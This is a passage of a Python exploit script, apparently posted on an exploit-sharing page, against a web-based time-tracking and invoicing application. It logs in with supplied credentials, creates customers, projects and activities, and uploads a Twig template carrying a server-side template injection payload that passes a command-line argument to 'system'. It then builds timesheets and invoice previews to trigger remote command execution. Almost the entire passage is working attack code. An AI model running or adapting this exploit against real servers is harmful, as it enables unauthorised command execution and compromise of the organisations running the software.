            'invoice\_document\_upload\_form\[document\]': ('din.pdf.twig', f"<html><body>{{{{\['{sys.argv\[4\]}'\]|map('system')|join}}}}</body></html>", 'text/x-twig'),
            'invoice\_document\_upload\_form\[\_token\]': (None, token)
        }
        
        response \= session.post(f"{BASE\_URL}/invoice/document\_upload", files\=form\_data)
        
        if ".pdf.twig" in response.text:
            print("\[+\] Twig uploaded successfully!")
        else:
            print("\[-\] Error while uploading, exiting..")
            exit(1)

    except Exception as e:
        print(f"An error occurred: {str(e)}")
import re

def create\_malicious\_template(token, name, session):
    try:
        data \= {
            'invoice\_template\_form\[name\]': name,
            'invoice\_template\_form\[title\]': name,
            'invoice\_template\_form\[company\]': name,
            'invoice\_template\_form\[vatId\]': '',
            'invoice\_template\_form\[address\]': '',
            'invoice\_template\_form\[contact\]': '',
            'invoice\_template\_form\[paymentTerms\]': '',
            'invoice\_template\_form\[paymentDetails\]': '',
            'invoice\_template\_form\[dueDays\]': '30',
            'invoice\_template\_form\[vat\]': '0.000',
            'invoice\_template\_form\[language\]': 'en',
            'invoice\_template\_form\[numberGenerator\]': 'default',
            'invoice\_template\_form\[renderer\]': 'din',
            'invoice\_template\_form\[calculator\]': 'default',
            'invoice\_template\_form\[\_token\]': token
        }
        
        response \= session.post(f"{BASE\_URL}/invoice/template/create", data\=data)
        
        \# Define the regex pattern to capture the template ID and match the name
        pattern \= re.compile(fr'<tr class="modal-ajax-form open-edit" data-href="/en/invoice/template/(\\d+)/edit">\\s\*<td class="alwaysVisible col\_name">{re.escape(name)}</td>', re.DOTALL)
        
        \# Search the response text with the regex pattern
        match \= pattern.search(response.text)
        
        if match:
            template\_id \= match.group(1)  \# Extract the captured group
            print(f"\[+\] Malicious Template: {name}, Template ID: {template\_id}")
            return template\_id  \# Return the captured template ID
        else:
            print("\[-\] Failed to capture the template ID")
            create\_malicious\_template(token,name,session)
        
    except Exception as e:
        print(f"An error occurred: {str(e)}")
        exit(1)

def create\_timesheet(token, activity, project, session):
    form\_data \= {
            'timesheet\_edit\_form\[begin\_date\]': (None, '01/01/1980'),
            'timesheet\_edit\_form\[begin\_time\]': (None, '12:00 AM'),
            'timesheet\_edit\_form\[duration\]': (None, '0:15'),
            'timesheet\_edit\_form\[end\_time\]': (None, '12:15 AM'),
            'timesheet\_edit\_form\[customer\]': (None, ''),
            'timesheet\_edit\_form\[project\]': (None, project),
            'timesheet\_edit\_form\[activity\]': (None, activity),
            'timesheet\_edit\_form\[description\]': (None, ''),
            'timesheet\_edit\_form\[fixedRate\]': (None, ''),
            'timesheet\_edit\_form\[hourlyRate\]': (None, ''),
            'timesheet\_edit\_form\[billableMode\]': (None, 'auto'),
            'timesheet\_edit\_form\[\_token\]': (None, token)
        }
    response \= session.post(f"{BASE\_URL}/timesheet/create", files\=form\_data,allow\_redirects\=False)
    if response.status\_code \== 302:  \# Changed to 200 as 301 is for redirection
        print(f"\[+\] Created a new timesheet")

##############################

\# login
csrf, \_, \_, \_, \_ \= get\_csrf("/login", session) 
\# login("admin", "password", csrf, session)
login(sys.argv\[2\],sys.argv\[3\],csrf,session)
\# create new customer

get\_customer\_token, \_, \_, \_, \_ \= get\_csrf("/admin/customer/create", session)  
customer\_name \= generate()
create\_customer(get\_customer\_token, customer\_name, session)
\# create new project with customer\_name

get\_project\_token, customer\_id, \_, \_, \_ \= get\_csrf("/admin/project/create", session)  
project\_name \= generate()
create\_project(get\_project\_token, project\_name, customer\_id, session)

\# create new activity 
get\_activity\_token, project\_id, \_, \_, \_ \= get\_csrf("/admin/activity/create", session)
activity\_name \= generate()
create\_activity(get\_activity\_token, activity\_name, project\_id, session)

\# EXPLOIT
######################

\# upload malicious file
upload\_token, \_, \_, \_, \_ \= get\_csrf("/invoice/document\_upload", session)
upload\_malicious\_document(upload\_token, session)

\# create malicious template to trigger the SSTI
get\_template\_token, \_, \_, \_, \_ \= get\_csrf("/invoice/template/create", session)
template \= generate()
temp\_id \= create\_malicious\_template(get\_template\_token, template, session)

\# create a timesheet with project\_id and activity\_id
activity\_customer\_list \= get\_csrf("/timesheet/create", session)\[4\]  \# get the activity\_customer\_list from get\_csrf function

print(f"\[+\] Constructing renderer URLs..")
\# iterate through all relative project\_ids and customer\_id for exploit stabiliy
for activity\_id, customer\_id in activity\_customer\_list:
    csrf \= get\_csrf("/timesheet/create", session)\[0\]  \# Update CSRF token for each iteration
    print(f"\[+\] Creating timesheets with: Activity ID: {activity\_id}, Customer ID: {customer\_id}")
    create\_timesheet(csrf, activity\_id, customer\_id, session)
    postData \= {
        "searchTerm": "",
        "daterange": "",
        "state": "1",
        "billable": "0",
        "exported": "1",
        "orderBy": "begin",
        "order": "DESC",
        "exporter": "pdf"
    }
    \# export timesheets so they appear in exported invoices
    export \= session.post(f"{BASE\_URL}/timesheet/export/", data\=postData).text
    if "PDF-1.4" in export:
        csrf, \_, \_, \_, \_ \= get\_csrf("/invoice/", session)
        \# get preview token to construct the preview URL to trigger SSTI
        csrf, project\_id, preview\_id, template\_ids, activity\_customer\_list \= get\_csrf(f"/invoice/?searchTerm=&daterange=&exported=1&invoiceDate=1%2F1%2F1980&performSearch=performSearch&\_token={csrf}&template={temp\_id}", session)
        for template\_id in template\_ids:
            rendererURL \= f"{BASE\_URL}/invoice/preview/{customer\_id}/{preview\_id}?searchTerm=&daterange=&exported=1&template={temp\_id}&invoiceDate=&\_token={csrf}&customers\[\]={customer\_id}"
            \# trigger the payload by visiting the renderer URL 
            rce \= session.get(rendererURL)
            
            if "PDF-1.4" in rce.text:
                print(rendererURL)
                print("\[+\] successfully executed payload")
                \# save the pdf locally since rendered URL will expire as soon as we end the session
                pdf \= f"{generate()}.pdf"
                with open(pdf,'wb') as pdfFile:
                    pdfFile.write(rce.content)
                    pdfFile.flush()
                    pdfFile.close()
                    print(f"\[+\] Saved results with name: {pdf}")
                exit(1)

print("\[-\] Failed to execute payload, try to trigger manually..")

Tag

#web